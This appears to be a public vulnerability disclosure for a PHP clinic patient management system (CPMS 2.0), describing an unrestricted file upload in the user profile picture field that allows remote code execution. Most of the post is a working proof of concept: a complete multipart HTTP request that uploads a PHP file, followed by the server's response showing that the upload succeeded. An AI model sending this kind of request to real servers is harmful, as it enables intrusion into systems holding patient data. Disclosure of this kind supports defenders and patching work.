PHP - CPMS Version 2.0 File Upload and Remote Code Execution - RCE Vulnerabilities

2025.01.07
bg nu11secur1ty (BG) bg
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Titles: PHP - CPMS Version 2.0 File Upload and Remote Code Execution - RCE Vulnerabilities # Author: nu11secur1ty # Date: 12/19/2024 # Vendor: https://github.com/oretnom23 # Software: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code#comment-105951 # Reference: https://portswigger.net/web-security/file-upload & https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-polyglot-web-shell-upload ## Description: profile_picture parameter is not sanitizing correctly for file upload extension vulnerabilities. The malicious admin actor can upload a very dangerous PHP file to the server and execute it directly from his browser. STATUS: HIGH-CRITICAL Vulnerability [+]PoC: ```POST POST /pwnedhost/pms/update_user.php?user_id=1 HTTP/1.1 Host: 192.168.100.45 Cookie: PHPSESSID=9frtcadqm6q0ttavrpjquh3hif Content-Length: 728 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="131", "Not_A Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Origin: https://192.168.100.45 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2AQt0lyUq6vhBVY9 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://192.168.100.45/pwnedhost/pms/update_user.php?user_id=1 Accept-Encoding: gzip, deflate, br Priority: u=0, i Connection: keep-alive ------WebKitFormBoundary2AQt0lyUq6vhBVY9 Content-Disposition: form-data; name="hidden_id" 1 ------WebKitFormBoundary2AQt0lyUq6vhBVY9 Content-Disposition: form-data; name="display_name" Administrator ------WebKitFormBoundary2AQt0lyUq6vhBVY9 Content-Disposition: form-data; name="username" admin ------WebKitFormBoundary2AQt0lyUq6vhBVY9 Content-Disposition: form-data; name="password" ------WebKitFormBoundary2AQt0lyUq6vhBVY9 Content-Disposition: form-data; name="profile_picture"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundary2AQt0lyUq6vhBVY9 Content-Disposition: form-data; name="save_user" ------WebKitFormBoundary2AQt0lyUq6vhBVY9-- ``` [+]Response: ``` HTTP/1.1 302 Found Date: Fri, 03 Jan 2025 09:10:14 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: congratulation.php?goto_page=users.php&message=user update successfully Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 10476 <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- Google Font: Source Sans Pro --> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,400i,700&display=fallback"> <!-- Font Awesome --> <link rel="stylesheet" href="plugins/fontawesome-free/css/all.min.css"> <!-- Theme style --> <link rel="stylesheet" href="dist/css/adminlte.min.css"> <link rel="stylesheet" href="dist/js/jquery_confirm/jquery-confirm.css"> <link rel="stylesheet" href="dist/css/default.css" /> <title>Update User Details - Clinic's Patient Management System in PHP</title> </head> <body class="hold-transition sidebar-mini dark-mode layout-fixed layout-navbar-fixed"> <!-- Site wrapper --> <div class="wrapper"> <!-- Navbar --> <!-- Navbar --> <nav class="main-header navbar navbar-expand navbar-dark navbar-light fixed-top"> <!-- Left navbar links --> <ul class="navbar-nav"> <li class="nav-item"> <a class="nav-link" data-widget="pushmenu" href="#" role="button"><i class="fas fa-bars"></i></a> </li> </ul> <a href="index3.html" class="navbar-brand"> <span class="brand-text font-weight-light">Clinic's Patient Management System - PHP </span> </a> <!-- Right navbar links --> <ul class="navbar-nav ml-auto"> <li class="nav-item"> <div class="login-user text-light font-weight-bolder">Howdy, Administrator!</div> </li> </ul> </nav> <!-- /.navbar --><aside class="main-sidebar sidebar-dark-primary bg-black elevation-4"> <a href="./" class="brand-link logo-switch bg-black"> <h4 class="brand-image-xl logo-xs mb-0 text-center"><b>CMS</b></h4> <h4 class="brand-image-xl logo-xl mb-0 text-center">Clinic's <b>CMS</b></h4> </a> <!-- Sidebar --> <div class="sidebar"> <!-- Sidebar user (optional) --> <div class="user-panel mt-3 pb-3 mb-3 d-flex"> <div class="image"> <img src="user_images/17358952721nsi1deyou.php " class="img-circle elevation-2" alt="User Image" /> </div> <div class="info"> <a href="#" class="d-block">Administrator</a> </div> </div> <!-- Sidebar Menu --> <nav class="mt-2"> <ul class="nav nav-pills nav-sidebar flex-column" data-widget="treeview" role="menu" data-accordion="false"> <!-- Add icons to the links using the .nav-icon class with font-awesome or any other icon font library --> <li class="nav-item" id="mnu_dashboard"> <a href="dashboard.php" class="nav-link"> <i class="nav-icon fas fa-tachometer-alt"></i> <p> Dashboard </p> </a> </li> <li class="nav-item" id="mnu_patients"> <a href="#" class="nav-link"> <i class="nav-icon fas fa-user-injured"></i> <p> <i class="fas "></i> Patients <i class="right fas fa-angle-left"></i> </p> </a> <ul class="nav nav-treeview"> <li class="nav-item"> <a href="new_prescription.php" class="nav-link" id="mi_new_prescription"> <i class="far fa-circle nav-icon"></i> <p>New Prescription</p> </a> </li> <li class="nav-item"> <a href="patients.php" class="nav-link" id="mi_patients"> <i class="far fa-circle nav-icon"></i> <p>Add Patients</p> </a> </li> <li class="nav-item"> <a href="patient_history.php" class="nav-link" id="mi_patient_history"> <i class="far fa-circle nav-icon"></i> <p>Patient History</p> </a> </li> </ul> </li> <li class="nav-item" id="mnu_medicines"> <a href="#" class="nav-link"> <i class="nav-icon fas fa-pills"></i> <p> Medicines <i class="fas fa-angle-left right"></i> </p> </a> <ul class="nav nav-treeview"> <li class="nav-item"> <a href="medicines.php" class="nav-link" id="mi_medicines"> <i class="far fa-circle nav-icon"></i> <p>Add Medicine</p> </a> </li> <li class="nav-item"> <a href="medicine_details.php" class="nav-link" id="mi_medicine_details"> <i class="far fa-circle nav-icon"></i> <p>Medicine Details</p> </a> </li> </ul> </li> <li class="nav-item" id="mnu_reports"> <a href="#" class="nav-link"> <i class="nav-icon fas fa-edit"></i> <p> Reports <i class="fas fa-angle-left right"></i> </p> </a> <ul class="nav nav-treeview"> <li class="nav-item"> <a href="reports.php" class="nav-link" id="mi_reports"> <i class="far fa-circle nav-icon"></i> <p>Reports</p> </a> </li> </ul> </li> <li class="nav-item" id="mnu_users"> <a href="users.php" class="nav-link"> <i class="nav-icon fa fa-users"></i> <p> Users </p> </a> </li> <li class="nav-item"> <a href="logout.php" class="nav-link"> <i class="nav-icon fa fa-sign-out-alt"></i> <p> Logout </p> </a> </li> </ul> </nav> <!-- /.sidebar-menu --> </div> <!-- /.sidebar --> </aside> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <div class="container-fluid"> <div class="row mb-2"> <div class="col-sm-6"> <h1>Users</h1> </div> </div> </div><!-- /.container-fluid --> </section> <!-- Main content --> <section class="content"> <!-- Default box --> <div class="card card-outline card-primary rounded-0 shadow"> <div class="card-header"> <h3 class="card-title">Update User</h3> <div class="card-tools"> <button type="button" class="btn btn-tool" data-card-widget="collapse" title="Collapse"> <i class="fas fa-minus"></i> </button> </div> </div> <div class="card-body"> <form method="post" enctype="multipart/form-data"> <input type="hidden" name="hidden_id" value="1"> <div class="row"> <div class="col-lg-4 col-md-4 col-sm-4 col-xs-10"> <label>Display Name</label> <input type="text" id="display_name" name="display_name" required="required" class="form-control form-control-sm rounded-0" value="Administrator" /> </div> <br> <br> <br> <div class="col-lg-4 col-md-4 col-sm-4 col-xs-10"> <label>Username</label> <input type="text" id="username" name="username" required="required" class="form-control form-control-sm rounded-0" value="admin" /> </div> <div class="col-lg-4 col-md-4 col-sm-4 col-xs-10"> <label>Password</label> <input type="password" id="password" name="password" class="form-control form-control-sm rounded-0"/> </div> <div class="col-lg-4 col-md-4 col-sm-4 col-xs-10"> <label>Profile picture</label> <input type="file" id="profile_picture" name="profile_picture" class="form-control form-control-sm rounded-0" /> </div> </div> </div> <div class="clearfix">&nbsp;</div> <div class="row"> <div class="col-lg-11 col-md-10 col-sm-10">&nbsp;</div> <div class="col-lg-1 col-md-2 col-sm-2 col-xs-2"> <button type="submit" id="save_user" name="save_user" class="btn btn-primary btn-sm btn-flat btn-block">Update</button> </div> </div> </form> </div> </div> </section> <footer class="main-footer fixed-bottom"> <strong>Copyright &copy; 2025 <a href="./">Clinic's Patient Management System</a>.</strong> All rights reserved. <div class="float-right d-sm-block"> PHP - CPMS Version 2.0 </div> </footer> <!-- Control Sidebar --> <aside class="control-sidebar control-sidebar-dark"> <!-- Control sidebar content goes here --> </aside> <!-- /.control-sidebar --> </div> <!-- ./wrapper --> <!-- jQuery --> <script src="plugins/jquery/jquery.min.js"></script> <!-- Bootstrap 4 --> <script src="plugins/bootstrap/js/bootstrap.bundle.min.js"></script> <!-- AdminLTE App --> <script src="dist/js/adminlte.min.js"></script> <!-- AdminLTE for demo purposes --> <!-- <script src="dist/js/demo.js"></script> --> <script src="dist/js/jquery_confirm/jquery-confirm.js"></script> <script src="dist/js/common_javascript_functions.js"></script> <script> var message = ''; if(message !== '') { showCustomMessage(message); } </script> </body> </html> ``` # Reproduce: [href](https://www.patreon.com/posts/cpms-version-2-0-119208840) ## Time spent: 00:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2025, cxsecurity.com

 

Back to Top